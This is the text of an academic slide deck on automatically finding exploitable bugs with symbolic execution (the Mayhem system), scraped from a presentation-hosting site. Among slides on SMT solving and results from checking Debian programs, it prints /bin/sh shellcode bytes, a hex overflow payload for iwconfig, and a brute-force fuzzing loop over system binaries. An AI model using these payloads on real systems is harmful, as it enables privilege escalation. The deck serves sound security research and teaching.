checking the world s software for exploitable bugs
Download
Skip this Video
Download Presentation
Checking the World’s Software for Exploitable Bugs

Loading in 2 Seconds...

play fullscreen
1 / 70

Checking the World’s Software for Exploitable Bugs - PowerPoint PPT Presentation


  • 85 Views
  • Uploaded on

Checking the World’s Software for Exploitable Bugs. David Brumley Carnegie Mellon University [email protected] http:// security.ece.cmu.edu /. An e pic battle. Black. White. vs. format c:. E xploit b ugs. Bug. Black. White. format c:. OK. Exploit. $ iwconfig accesspoint

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Checking the World’s Software for Exploitable Bugs' - lucian


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
checking the world s software for exploitable bugs

Checking the World’s Software for Exploitable Bugs

David Brumley

Carnegie Mellon University

[email protected]

http://security.ece.cmu.edu/

slide2
An epic battle

Black

White

vs.

format c:

slide3
Exploitbugs

Bug

Black

White

format c:

slide4
OK

Exploit

$ iwconfigaccesspoint

$ iwconfig

#

01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd

Superuser

slide5
Bug Fixed!

Black

White

format c:

slide7
inp=`perl –e '{print "A"x8000}'`
  • for program in /usr/bin/*; do
    • for opt in {a..z} {A..Z}; do
    • timeout –s 9 1s $program -$opt $inp
    • done
  • done

1009 Linux programs. 13 minutes. 52 newbugs in 29 programs.

def con 2012 scoreboard
DEF CON 2012 scoreboard

CMU

Time (3 days total)

slide14
I skate to where the puck is going to be,

not where it has been.

--- Wayne Gretzky Hockey Hall of Fame

slide15
White

Our Vision:AutomaticallyCheck the World’s Software for Exploitable Bugs

verification but with a twist
Verification, but with a twist

CorrectSafe paths

Verification

Program

Incorrect

Exploit

Correctness PropertyUn-exploitability Property

33,248 programs 152 new exploitablebugs

outline
Outline
  • Basic exploitation
  • Symbolic execution for exploit generation
  • Automatic exploit generation on real code
  • Experiments
  • Related projects and the future
c ontrol flow hijack
Control flow hijack

attacker gains control of execution

  • buffer overflow
  • format string attack
  • heap metadata overwrite
  • use-after-free
  • ...

Same principle,different mechanism

b asic execution semantics of compiled code
Basic execution semantics of compiled code

Process Memory

Instruction Pointer points to next instruction to execute

Fetch, decode, execute

Code

Processor

EIP

Data

...

...

Stack

Heap

Control Flow Hijack:

EIP = Attacker Code

read and write

b uffer overflows and the runtime stack
Buffer overflows and the runtimestack
  • int vulnerable(char *input)
  • {
  • char buf[32];
  • int x;
  • if(...){ x = 1;
  • } else {
  • x = 0;
  • }
  • strcpy(buf,input);
  • return x;
  • }

local variables

Control flow hijack when

input length > buffer length

execution semantics, including call/return

slide23
lower addresses

locals allocated on stack

vulnerable’sinitialstackframe

int vulnerable(char *input)

{

char buf[32];

int x;

...

strcpy(buf,input);

return x;

}

slide24
input = “ABC\0”

lower addresses

Writes go up!

writes

ABC\0

int vulnerable(char *input)

{

char buf[32];

int x;

...

strcpy(buf,input);

return x;

}

slide25
“return address”

“return address”

caller(){

i: vulnerable(input);

i+1: ...

saved eip

lower addresses

ABC\0

int vulnerable(char *input)

{

char buf[32];

int x;

...

strcpy(buf,input);

return x;

}

Processor

EIP

slide26
A buffer overflow occurs when data is written outside of the space allocated for the buffer.
  • C does not check that writes are in-bound

writes

Classic Exploit:overwrite saved EIP

Traditionally we show exploitability by running shellcode

* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research

s hellcode is a string
Shellcode is a string

execve(“/bin/sh”, 0, 0);

Compile

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f

\x73\x68\x68\x2f\x62\x69\x6e\x89

\xe3\xb0\x0b\xcd\x80

Executable String

Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php

slide28
input = shellcode . address of buf

&buf

\x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f...

int vulnerable(char *input)

{

char buf[32];

int x;

...

strcpy(buf,input);

return x;

}

&buf

Processor

EIP

slide29
input = shellcode . address of buf

Owned!

%eip =

execve(“/bin/sh”, NULL)

&buf

\x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f...

int vulnerable(char *input)

{

char buf[32];

int x;

...

strcpy(buf,input);

return x;

}

&buf

Processor

EIP

v erification but with a twist
Verification, but with a twist

CorrectSafe path

Verification

Program

Incorrect

Exploitable

Correctness PropertyUn-exploitability Property

We use symbolic execution to test paths[Boyer75, Howden75,King76]

basic symbolic execution
Basic symbolic execution

x = input()

x can be anything

x > 42

if x > 42

t

f

(x > 42)

∧ (x*x != MAXINT)

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧!(x < 42)

jmp stack[x]

if x < 42

t

f

slide33
x = input()

x can be anything

x > 42

if x > 42

Path formula(true for inputs that take path)

t

f

(x > 42)

∧ (x*x != MAXINT)

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧!(x < 42)

jmp stack[x]

if x < 42

t

f

b asic symbolic execution
Basic symbolic execution

Satisfiable(x = 43)

x = input()

path test case!

SatisfiabilityModulo Theory (SMT)Solver

if x > 42

t

f

if x*x = MAXINT

t

f

(x >42)

∧ (x*x != MAXINT)

∧!(x < 42)

jmp stack[x]

if x < 42

t

f

b asic symbolic execution1
Basic symbolic execution

UNSAT (infeasible)

x = input()

SMT Solver

if x > 42

t

f

if x*x = MAXINT

t

f

(x >42)

∧ (x*x != MAXINT)

∧(x <= 42)

jmp stack[x]

if x < 42

t

f

c hecking non exploitability
Checking non-exploitability

x = input()

Un-exploitability property:

EIP != user input

if x > 42

t

f

(x > 42)

∧ (x*x == MAXINT)

∧ Un-exploitable

if x*x = MAXINT

t

f

jmp stack[x]

if x < 42

t

f

c hecking non exploitability1
Checking non-exploitability

SAT (safe)

UNSAT(exploit)

SMT

eip!= user input

For each path

r eal world exploit generation a brief history
Real world exploit generationa brief history

Ours

Others

And >150 papers on symbolic execution

exploiting real code the mayhem architecture
Exploiting Real Code:The Mayhem Architecture

Principles:

Require only the binarye.g., BAP, our binary analysis platform

Use intelligent analysis to reduce state space e.g., preconditioned symbolic execution

Make queries to SMT as easy as possiblee.g., symbolic memories

p otentially infinite state space
Potentially infinite state space

strcpy(buf, input);

if (input[0] != 0)

if (input[1] != 0)

if (input[n] != 0)

t

t

t

f

f

f

while(input[i] != 0){

buf[i] = input[i]; i++;

}

buf[i] = 0;

check every branch blindly
check every branch blindly

if (input[0] != 0)

if (input[1] != 0)

if (input[n] != 0)

20 min

exploration

t

t

t

f

f

f

30 min

exploration

x min

exploration

Exploitable

bug found

KLEE [Cadar’08] does this

preconditioned symbolic execution
Preconditioned symbolic execution

All Inputs

Trigger bug

Preconditions focus search, e.g.:input > len

Control Hijack

input vs bugs doesn’t typecheck

other examples in [Avgerinos11]

slide44
Static and online analysis determines likely exploit conditions
  • 40 bytes
  • All non-NULL

char buf[32];

int x;

...

strcpy(buf, input);

example length p recondition
Example: length precondition

Precondition Check:

length(input) > 40

∧input[0] == 0

Unsatisfiable

If (input[0] != 0)

If (input[1] != 0)

If (input[n] != 0)

Unsatisfiable

Not explored.

Saved 20 min

t

t

t

f

f

f

Precondition Check:

length(input) > 40

∧input[1] == 0

Not explored.

Saved 30min

Not explored.

Saved x min

Exploitable

bug found

slide46
Don’t treat as a black box!

SAT. (x = 43)

SMT Solver

“program” the SMT

(x >42)

∧ (x*x != 0xffffffff)

∧!(x < 42)

s ymbolic memory indices
Symbolic memory indices

x can be anything

x := user_input();

y := mem[x];

assert(y = 42);

vulnerable();

Which memory cell contains42?

232 cells to check

0

Memory

232-1

s ymbolic addresses occur often
Symbolic addresses occur often

Other causes

  • Parsing: sscanf, vfprintf, etc.
  • Character test: isspace, isalpha, etc.
  • Conversion: toupper, tolower, mbtowc, etc.

c = get_char();

...

to_lower(c);

to_lower(char c){

c >= -128 && c < 256 ? tbl[c] : c;

}

tbl+’A’

Address is symbolic

concretization test case generation
Concretization: test case generation

e.g., SAGE, DART, CUTE, KLEE

x := user_input();

y := mem[30];

assert(y = 42);

vulnerable();

Misses over 40% of exploits

1 cell to check

0

30

Memory

232-1

observation
Observation

f

t

x can be anything

Path formula constrains rangeof symbolic memoryaccesses

f

t

x > 0

x < 5

0 < x < 5

y = mem[x]

assert(y==42)

Use symbolic execution state to:Step 1: Bound memory addresses referencedStep 2: Reduce to linear formulas

slide51
piecewise linear equations

Ind.

Value

know: 0 < x < 5

y = mem[x]

40% more exploits(strength reduction)

4

1

y = - 2*x + 28

Value

22

20

y = 2*x + 10

12

10

Index

experiments with mayhem
Experiments with Mayhem
  • Known exploitable bugs
  • Coverage for 997 programs
  • Checking Debian
slide53
[Cha et al, NDSS’12]

Windows

2 Unknown Bugs:FreeRadius,GnuGol

Linux

coverage
coverage

50% on average tested

50%Unchecked

  • Code coverage measures percentage of statements executed at least once by symbolic executor
  • Mayhem coverage measured on 997 programs compiled with gcovfrom /usr/bin and /bin
unique code lines covered
Unique code lines covered

total unique lines (all programs): 2,245,632

lines covered (all programs): 437,455

absolute coverage: 19.48%

!

Achieving 100% impossible due to dead code and other factors

checking debian
Checking Debian

33,248 programs

2,727 days CPU time

15,914,407,892 SMT queries

199,685,594 test cases

2,365,154 crashes

11,690 unique bugs

152 newexploits

public data
public data

http://forallsecure.com/summaries

mining data
mining data

Q: How long do queries take on average?

A: 3.67ms on average with 0.34 variance

Q: Should I optimize hard or easy formulae?

A: 99.99% take less than 1 secondand account for 78% of total time

Q: Do queries get harder?

A: Good question...

optimize fast queries

slide60
500 sec timeout

No dominant upward trend in time to solve

hardness is likely localized
hardness is (likely)localized

Sym Exe. Thread

Depth 0(Pointer Res.)

HardQuery

Depth 1

Depth 2

slide63
Only 39 programs create hard formulas

a/10 replaced with (a*0xcccccccd) >> 3

we are not perfect
We are not perfect
  • We don’t claim to find all exploitable bugs
  • “Exploitability” vs “safe” wrt to fixed input size
  • Better symbolic execution

But each report isactionable.

symbolic execution thrusts
symbolic execution thrusts

2. Binary ProgramVerification

path merging, faster SMT

1. Formalize Exploit

control flow hijack, information leaks, command injection

3. Real Code

Handle messy details, transactional rollback

the larger pipeline
the larger pipeline

15,546 vulns[Jang12]

BAP [Brumley11]Decompiler[Schwartz13]

2 year total:27,659 bugs

15,698 vulns

Triage

Program Analysis

static analysis

unpatched code clones

fuzzing

symbolicexecution

scheduling

Check OS Distribution

Weighted coupon bug collecting with randomized MAB algs. 1.55x more bugs [Woo13]

Mayhem 11,690 bugs, 152 exploits [Cha11,Avgerinos12]

we re not even close to done
we’re not even close to done

C

GE

Re

A

Breaking the Satisfiability Barrier

(NSF, with Tinelli and Barrett)

  • And others:
  • SMT Hardness (w/ Williams)
  • Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry)
  • Vetting commodity systems (DARPA, w/ Gligor, Jaeger)
  • ....

Refinement-Based Component Analysisfor Binary Code(DARPA, with Engler)

High School Hacking Competition

slide68
White

Our Vision:AutomaticallyCheck the World’s Software for Exploitable Bugs

It seems wrongto not try.

slide69
Thank You!

Questions?

Credits

Postdocs: Manuel Egele

Maverick Woo

PhD Students: Thanassis Avgerinos

Tiffany Bao

Sang Kil Cha

Peter Chapman

Samantha Gottlieb

Jiyong Jang

Matt Maurer

Alex Rebert

Ed Schwartz

Jonathan Burket

Undergrads: David Kohlbrenner

Tyler Nighswander

Brian Pak

Collaborators: Robert Brumley

Jonathan Diamond

Brent Ledvina

Special Thanks: Coherent Navigation

Mike Carns

Pete Kind

Barbara McNamara

Funding: Core Security

DARPA

Google

Lockheed Martin

Northrop Grumman

NSA

NSF

SEI

ODNI

Symantec

Microsoft

Wiley

Pearson

Amazon AWS

ad